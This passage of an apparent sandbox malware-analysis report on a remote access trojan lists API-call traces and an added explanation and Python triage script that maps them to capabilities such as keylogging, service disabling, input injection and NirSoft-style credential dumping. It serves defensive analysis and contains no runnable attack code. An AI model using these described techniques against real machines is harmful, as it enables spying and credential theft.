                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00406331
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406379
                      • CloseHandle.KERNEL32(00000000), ref: 004063B3
                      • MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                      • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063EF
                      • DeleteFileW.KERNEL32(00000000), ref: 004063FE
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                      • String ID: .part
                      • API String ID: 820096542-3499674018
                      • Opcode ID: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
                      • Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
                      • Opcode Fuzzy Hash: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
                      • Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415D21,00000000), ref: 004165ED
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415D21,00000000), ref: 00416601
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 0041660E
                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415D21,00000000), ref: 00416643
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416655
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416658
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                      • String ID: !]A
                      • API String ID: 493672254-3355486170
                      • Opcode ID: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                      • Instruction ID: 232e6080decb0fee5e9ead3af30a3f9a58c51749ff75a055db7eec232c54b811
                      • Opcode Fuzzy Hash: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                      • Instruction Fuzzy Hash: 59016D311443253AD6114F3C9C4EEBF3B6CDB417B2F01032BF925922D2DA68CE4295AD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415F36,00000000), ref: 0041651E
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415F36,00000000), ref: 00416532
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 0041653F
                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00415F36,00000000), ref: 0041654E
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416560
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416563
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID: 6_A
                      • API String ID: 221034970-3814682797
                      • Opcode ID: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                      • Instruction ID: da1897a772ed1359c9b05f965c8e3084c4a483461664f911434d7ad5a9b28404
                      • Opcode Fuzzy Hash: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                      • Instruction Fuzzy Hash: 90F0C2715403187BD221AF65EC49DBF3B6CDB45B92F00002AFE0992196DA38CE4596E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 00444649
                      • __alloca_probe_16.LIBCMT ref: 00444681
                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 004446CF
                      • __alloca_probe_16.LIBCMT ref: 00444766
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004447C9
                      • __freea.LIBCMT ref: 004447D6
                        • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                      • __freea.LIBCMT ref: 004447DF
                      • __freea.LIBCMT ref: 00444804
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 3864826663-0
                      • Opcode ID: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                      • Instruction ID: 38c3e806ad7a3790cd52a8b2f1174a250ebfd45b4bb0c692cfbb473d4bf5d511
                      • Opcode Fuzzy Hash: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                      • Instruction Fuzzy Hash: E951E3B2610216AFFB258F60CC41FAB77A9EB85754F15462BFC04D7240EB3CDC5186A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
                      • SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
                      • SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
                      • SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
                      • SendInput.USER32(00000001,?,0000001C,?), ref: 00415376
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: InputSend
                      • String ID:
                      • API String ID: 3431551938-0
                      • Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                      • Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
                      • Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                      • Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323
                        • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,7519FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                        • Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
                        • Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A
                      • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
                      • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105D6
                      • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 00410604
                      • Sleep.KERNEL32(000001F4,0045F464,0045F464,0045F464), ref: 0041061D
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                      • String ID: /stext "
                      • API String ID: 1351907930-3856184850
                      • Opcode ID: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
                      • Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
                      • Opcode Fuzzy Hash: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
                      • Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48
                      Uniqueness

                      Uniqueness Score: -1.00%

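The function listings above are the sandbox's raw output; the report does not say what they mean, so here is the reading a triage analyst takes from them. The SetWindowsHookExA / GetMessageA / DispatchMessageA block with the "Keylogger initialization failure" string is a hook-based keylogger and the message loop that services it. The three ADVAPI32 blocks stop a service (ControlService with control code 1, SERVICE_CONTROL_STOP), pause one (control code 2, SERVICE_CONTROL_PAUSE) and disable one (ChangeServiceConfigW with start type 4, SERVICE_DISABLED); only the control code and start type are decoded here, the other arguments are left as the sandbox shows them. The GdiplusStartup block with SHCreateMemStream(..., png) and the time_%04i... / wnd_%04i... format strings captures screenshots into PNG streams named by timestamp, sleeping 1000 ms (000003E8) between them. ShellExecuteW("open", "dxdiag") with "/t " and "\sysinfo.txt" writes a DirectX system report to a temp file that is then opened for reading (CreateFileW with 80000000, GENERIC_READ) and deleted. The CreateFileW / WriteFile / MoveFileW block with ".part" downloads to a temporary name and renames into place, and the eight consecutive SendInput calls inject synthetic keyboard and mouse events, the remote-control side of the RAT. Finally, the string /stext " is the command-line switch NirSoft's password-recovery utilities take to write their results to a text file; the block that uses it deletes files afterwards and sends data over a socket, which matches the Chrome and Firefox credential-theft signatures in the overview.

The following Python script is an added triage helper and is not part of the Joe Sandbox report or code from the sample. It parses the per-function "APIs" and "String ID" lines in the format shown on this page, skips inherited "Part of subcall function" entries, and applies the readings above as rules; the SERVICE_* names are the winsvc.h constants, and the sample input is a constructed excerpt of five blocks from this page, trimmed to the lines the rules need.

```python
"""Triage helper for the per-function "APIs / Strings" blocks of a Joe Sandbox report.
Added example, not part of the report and not Remcos code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Line shapes as they appear in the report (the bullet may survive extraction as "•" or "*").
_API_RE = re.compile(
    r"^\s*[•*]\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w:~@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
_STR_RE = re.compile(r"^\s*[•*]\s*String ID:\s*(?P<s>.*?)\s*$")
# winsvc.h constants behind the raw hex arguments the sandbox recovered.
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE", 3: "SERVICE_CONTROL_CONTINUE"}
SERVICE_START = {2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}

@dataclass
class FuncBlock:
    first_ref: str = ""  # address of the block's first direct call, used as its key
    calls: list[tuple[str, list[str]]] = field(default_factory=list)  # direct calls only: (api, args)
    strings: list[str] = field(default_factory=list)  # "String ID" entries, split on "$"

    @property
    def apis(self) -> set[str]:
        return {name for name, _ in self.calls}

def parse_blocks(report: str) -> list[FuncBlock]:
    """Split the report into per-function blocks; a block ends at its 'Uniqueness Score' line."""
    blocks, cur = [], FuncBlock()
    for line in report.splitlines():
        if (m := _API_RE.match(line)) and not m["sub"]:  # inherited subcall APIs are not the block's own
            cur.first_ref = cur.first_ref or m["ref"]
            cur.calls.append((m["name"], [a.strip() for a in (m["args"] or "").split(",") if a.strip()]))
        elif m := _STR_RE.match(line):
            cur.strings += [s for s in m["s"].split("$") if s]
        elif "Uniqueness Score" in line:
            if cur.calls:
                blocks.append(cur)
            cur = FuncBlock()
    return blocks + ([cur] if cur.calls else [])

def decode_arg(args: list[str], idx: int) -> int | None:
    """Decode one recovered argument; '?' means the sandbox could not recover the value."""
    try:
        return int(args[idx], 16)
    except (IndexError, ValueError):
        return None

def classify(block: FuncBlock) -> list[str]:
    """Map one block's direct APIs, strings and decoded arguments to the capability they imply."""
    apis, text, found = block.apis, " ".join(block.strings).lower(), []
    if {"SetWindowsHookExA", "GetMessageA"} <= apis:
        found.append("keylogger: Windows hook installed and serviced by a message loop")
    for name, args in block.calls:
        if name == "ControlService" and (code := decode_arg(args, 1)) in SERVICE_CONTROL:
            found.append(f"service tampering: ControlService {SERVICE_CONTROL[code]}")
        if name == "ChangeServiceConfigW" and (start := decode_arg(args, 2)) in SERVICE_START:
            found.append(f"service tampering: start type set to {SERVICE_START[start]}")
    if "/stext" in text and "DeleteFileW" in apis:
        found.append("credential dump: NirSoft-style '/stext' switch, output file deleted afterwards")
    if ".part" in text and {"WriteFile", "MoveFileW"} <= apis:
        found.append("download: data written to a .part file, then MoveFileW into place")
    return found

def triage(report: str) -> dict[str, list[str]]:
    """Return {address of first call: capabilities} for every block that triggers a rule."""
    return {b.first_ref: caps for b in parse_blocks(report) if (caps := classify(b))}

# Constructed excerpt in the report's own format: five blocks from this page, trimmed.
SAMPLE_REPORT = r"""
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
• SetWindowsHookExA.USER32 ref: 004088BB
• GetMessageA.USER32 ref: 00408915
• String ID: Keylogger initialization failure: error $[ERROR]
Uniqueness Score: -1.00%
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001), ref: 00416481
• ControlService.ADVAPI32(00000000,00000001,?), ref: 004164B4
Uniqueness Score: -1.00%
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000), ref: 00416643
Uniqueness Score: -1.00%
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00406331
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406379
• MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
• String ID: .part
Uniqueness Score: -1.00%
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323
  • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
• DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
• String ID: /stext "
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for ref, caps in triage(SAMPLE_REPORT).items():
        print(ref, "->", "; ".join(caps))
```

Run it against a text export of the whole "Execution Graph" section to get one line per function that matches a rule; the keys are the address of each block's first call, which is what you pivot on in the disassembly. Arguments the sandbox could not recover are shown as "?" and decode to None, so a rule never fires on a guess, and subcall lines are skipped so that an inherited send() does not make every caller look like an exfiltration routine.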
                      APIs
                        • Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
                        • Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
                        • Part of subcall function 004108E2: RegCloseKey.ADVAPI32(?), ref: 0041092C
                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
                      • PathFileExistsA.SHLWAPI(?), ref: 0040A498
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                      • API String ID: 1133728706-4073444585
                      • Opcode ID: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
                      • Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
                      • Opcode Fuzzy Hash: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
                      • Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                      • Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
                      • Opcode Fuzzy Hash: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                      • Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040E7F2
                      • int.LIBCPMT ref: 0040E805
                        • Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
                        • Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977
                      • std::locale::_Getfacet.LIBCPMT ref: 0040E80E
                      • std::_Facet_Register.LIBCPMT ref: 0040E845
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E84E
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86C
                      • __Init_thread_footer.LIBCMT ref: 0040E8AD
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                      • String ID:
                      • API String ID: 2409581025-0
                      • Opcode ID: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                      • Instruction ID: 03fd642756e00294ec4acf8aadaa37b4638c280f2e7f5516d862d72f379d1b29
                      • Opcode Fuzzy Hash: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                      • Instruction Fuzzy Hash: 7C21D332E001149BC714FB69D906A9E77B8DB44724B60417FE800B72D2EB78AD01879E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                        • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                      • wsprintfW.USER32 ref: 004096C3
                      • SetEvent.KERNEL32(?,00000000), ref: 004096ED
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: EventLocalTimechar_traitswsprintf
                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                      • API String ID: 3003339404-248792730
                      • Opcode ID: a464e92bc26aa4ab2780b6b025da8351db48c38763fc5baacaee56a9816591fb
                      • Instruction ID: dd13208d924f003fd79d0c2a63de2e9b71645c7df6fae77663c0b624719a6389
                      • Opcode Fuzzy Hash: a464e92bc26aa4ab2780b6b025da8351db48c38763fc5baacaee56a9816591fb
                      • Instruction Fuzzy Hash: 7021A4724001186AC728EBA5EC958FF77B9AF08355F00413FF847621D2EE78AA45D768
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA
                      • _free.LIBCMT ref: 004491C8
                        • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                        • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                      • _free.LIBCMT ref: 004491D3
                      • _free.LIBCMT ref: 004491DE
                      • _free.LIBCMT ref: 00449232
                      • _free.LIBCMT ref: 0044923D
                      • _free.LIBCMT ref: 00449248
                      • _free.LIBCMT ref: 00449253
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                      • Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
                      • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                      • Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
                      • SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 848315947e7627a59a283f1dea598c5d8ffdd06732940a2b65acc7d6341128d4
                      • Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
                      • Opcode Fuzzy Hash: 848315947e7627a59a283f1dea598c5d8ffdd06732940a2b65acc7d6341128d4
                      • Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405159
                      • SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405165
                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405170
                      • CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405179
                        • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                      • String ID: Connection KeepAlive disabled$[WARNING]
                      • API String ID: 2993684571-804309475
                      • Opcode ID: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
                      • Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
                      • Opcode Fuzzy Hash: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
                      • Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416769
                      • PlaySoundW.WINMM(00000000,00000000), ref: 00416777
                      • Sleep.KERNEL32(00002710), ref: 0041677E
                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416787
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: PlaySound$HandleLocalModuleSleepTime
                      • String ID: Alarm has been triggered!$[ALARM]
                      • API String ID: 614609389-1190268461
                      • Opcode ID: 126c17d4f44cec584df51f8685eff76a9cf7ee81dfadadc3ed7876a48e9b8e0e
                      • Instruction ID: 3dbfa3bc3acc833274b6e0f43357c326849184f6c95de14e1e3858e62b15b156
                      • Opcode Fuzzy Hash: 126c17d4f44cec584df51f8685eff76a9cf7ee81dfadadc3ed7876a48e9b8e0e
                      • Instruction Fuzzy Hash: D9E09222A00221379514376A6D0FD6F3D28CAC2B62B01016FFE08661829D944810C6FB
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __allrem.LIBCMT ref: 00435926
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435942
                      • __allrem.LIBCMT ref: 00435959
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435977
                      • __allrem.LIBCMT ref: 0043598E
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004359AC
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                      • Instruction ID: 35372c1425533dcebe3bda436374fdb164c2facb18fb88ba24de970f82e87be5
                      • Opcode Fuzzy Hash: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                      • Instruction Fuzzy Hash: 4D810972600F06ABE724AE69CC42B6B73E8AF49778F24552FF411D7681E77CD9008798
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: __cftoe
                      • String ID:
                      • API String ID: 4189289331-0
                      • Opcode ID: 490f4ba34fb9445138f821c7b04b278817217b66baaba8d1fac780bd761cbd39
                      • Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
                      • Opcode Fuzzy Hash: 490f4ba34fb9445138f821c7b04b278817217b66baaba8d1fac780bd761cbd39
                      • Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
